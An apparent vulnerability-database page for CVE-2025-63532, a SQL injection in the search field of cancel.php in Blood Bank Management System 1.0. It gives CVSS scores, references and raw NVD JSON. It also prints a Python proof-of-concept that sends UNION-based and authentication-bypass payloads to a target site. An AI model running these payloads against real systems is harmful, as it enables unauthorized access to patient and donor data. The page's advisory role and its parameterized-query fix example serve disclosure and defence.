Security Vulnerability Report
CVE-2025-63532 CVSS 9.6 CRITICAL

Published: 2025-12-01 16:15:56
Last Modified: 2025-12-04 18:08:17

Description

A SQL injection vulnerability exists in the Blood Bank Management System 1.0 within the cancel.php component. The application fails to properly sanitize user-supplied input in SQL queries, allowing an attacker to inject arbitrary SQL code. By manipulating the search field, an attacker can bypass authentication and gain unauthorized access to the system.

CVSS Details

CVSS Score: 9.6
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N
Weakness: CWE-89 (SQL Injection)

Note: the record in the Raw JSON Data section below carries two CVSS v3.1 assessments. The 9.6 CRITICAL rating shown here is the Secondary one (scope changed, no availability impact); the Primary assessment is 8.8 HIGH with vector CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H (scope unchanged, availability impact high). Both require low privileges and no user interaction over the network.

Configurations (Affected Products)

cpe:2.3:a:shridharshukl:blood_bank_management_system:1.0:*:*:*:*:*:*:* - VULNERABLE
Blood Bank Management System 1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
#!/usr/bin/env python3
# CVE-2025-63532 SQL Injection PoC
# Target: Blood Bank Management System 1.0 - cancel.php
# Author: Security Researcher
# Note: For authorized testing only

import requests
import sys


def exploit_sql_injection(target_url, payload):
    """
    Execute SQL injection attack on cancel.php search parameter
    """
    # Construct the malicious request
    params = {
        'search': payload  # Injected SQL payload
    }

    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
        'Content-Type': 'application/x-www-form-urlencoded'
    }

    try:
        # Send the malicious request
        response = requests.post(
            f"{target_url}/cancel.php",
            data=params,
            headers=headers,
            timeout=30
        )
        return response.text
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")
        return None


def extract_database_info(target_url):
    """
    Extract database version and current user using UNION-based injection
    """
    # Payload to extract database version
    version_payload = "' UNION SELECT NULL,version(),user(),database()-- -"

    print("[*] Extracting database information...")
    result = exploit_sql_injection(target_url, version_payload)
    return result


def bypass_authentication(target_url):
    """
    Bypass authentication by injecting SQL to return true condition
    """
    # Authentication bypass payload
    auth_bypass = "' OR '1'='1"

    print("[*] Attempting authentication bypass...")
    result = exploit_sql_injection(target_url, auth_bypass)
    return result


def main():
    if len(sys.argv) < 2:
        print("Usage: python3 cve-2025-63532.py <target_url>")
        print("Example: python3 cve-2025-63532.py http://victim.com/blood-bank")
        sys.exit(1)

    target = sys.argv[1].rstrip('/')

    print("=" * 60)
    print("CVE-2025-63532 SQL Injection PoC")
    print("Target: Blood Bank Management System 1.0")
    print("Component: cancel.php")
    print("=" * 60)

    # Step 1: Extract database information
    print("\n[1] Extracting database information...")
    db_info = extract_database_info(target)
    if db_info:
        print("[+] Database info extracted successfully")

    # Step 2: Bypass authentication
    print("\n[2] Attempting authentication bypass...")
    auth_result = bypass_authentication(target)
    if auth_result:
        print("[+] Authentication bypass attempted")

    print("\n[*] PoC execution completed")
    print("[*] Further exploitation requires manual analysis of responses")


if __name__ == "__main__":
    main()
```
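To make the root cause and the fix concrete, here is an added Python example (not code from the project, the PoC author, or the page) that runs the report's `' OR '1'='1` payload through a string-concatenated query of the kind the description attributes to cancel.php, and through the parameterized form that closes the hole. The `donors` table, its rows and the exact query shape are constructed assumptions, since the real cancel.php source is not shown here.

```python
"""Models the cancel.php search-field bug from the report against SQLite.

Added example, not the project's code: the real cancel.php source is not on
the page, so the donor table and the query shape are constructed to match
the description (user input concatenated into the SQL text).
"""
import sqlite3

# Constructed sample rows standing in for the application's donor records.
SAMPLE_ROWS = [
    ("alice", "O+", "alice@example.test"),
    ("bob", "A-", "bob@example.test"),
    ("carol", "B+", "carol@example.test"),
]


def make_db():
    """Build an in-memory table so the queries below run offline."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE donors (name TEXT, blood_group TEXT, email TEXT)")
    conn.executemany("INSERT INTO donors VALUES (?, ?, ?)", SAMPLE_ROWS)
    return conn


def search_vulnerable(conn, search):
    """The reported pattern: the search value is spliced into the SQL string."""
    sql = "SELECT name FROM donors WHERE name = '" + search + "'"
    return [row[0] for row in conn.execute(sql)]


def search_parameterized(conn, search):
    """Hardened form: the driver binds the value, so quotes stay data."""
    sql = "SELECT name FROM donors WHERE name = ?"
    return [row[0] for row in conn.execute(sql, (search,))]


def compare(search):
    """Run one search value through both forms; useful when reviewing a fix."""
    conn = make_db()
    return {
        "vulnerable": search_vulnerable(conn, search),
        "parameterized": search_parameterized(conn, search),
    }


if __name__ == "__main__":
    # The report's bypass payload: the vulnerable form matches every donor,
    # the parameterized form matches none.
    print(compare("' OR '1'='1"))
```

The vulnerable form turns the WHERE clause into `name = '' OR '1'='1'`, which is why a record check built this way lets any caller through; binding the value leaves the clause comparing against the literal payload string.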

References

https://drive.google.com/file/d/12yeOXW_sN69QjsQtW0_k9AGqozi1s0di/view?usp=sharing (Broken Link)
https://github.com/Shridharshukl/Blood-Bank-Management-System (Product)
https://github.com/kiwi865/CVEs/blob/main/CVE-2025-63532.md (Third Party Advisory)

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-63532",
    "sourceIdentifier": "[email protected]",
    "published": "2025-12-01T16:15:55.800",
    "lastModified": "2025-12-04T18:08:16.560",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "A SQL injection vulnerability exists in the Blood Bank Management System 1.0 within the cancel.php component. The application fails to properly sanitize user-supplied input in SQL queries, allowing an attacker to inject arbitrary SQL code. By manipulating the search field, an attacker can bypass authentication and gain unauthorized access to the system."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N",
            "baseScore": 9.6,
            "baseSeverity": "CRITICAL",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "CHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.1,
          "impactScore": 5.8
        },
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 8.8,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-89"
          }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:shridharshukl:blood_bank_management_system:1.0:*:*:*:*:*:*:*",
                "matchCriteriaId": "5B391DFD-8072-4642-9A31-9E4DE8648367"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://drive.google.com/file/d/12yeOXW_sN69QjsQtW0_k9AGqozi1s0di/view?usp=sharing",
        "source": "[email protected]",
        "tags": ["Broken Link"]
      },
      {
        "url": "https://github.com/Shridharshukl/Blood-Bank-Management-System",
        "source": "[email protected]",
        "tags": ["Product"]
      },
      {
        "url": "https://github.com/kiwi865/CVEs/blob/main/CVE-2025-63532.md",
        "source": "[email protected]",
        "tags": ["Third Party Advisory"]
      }
    ]
  }
}
```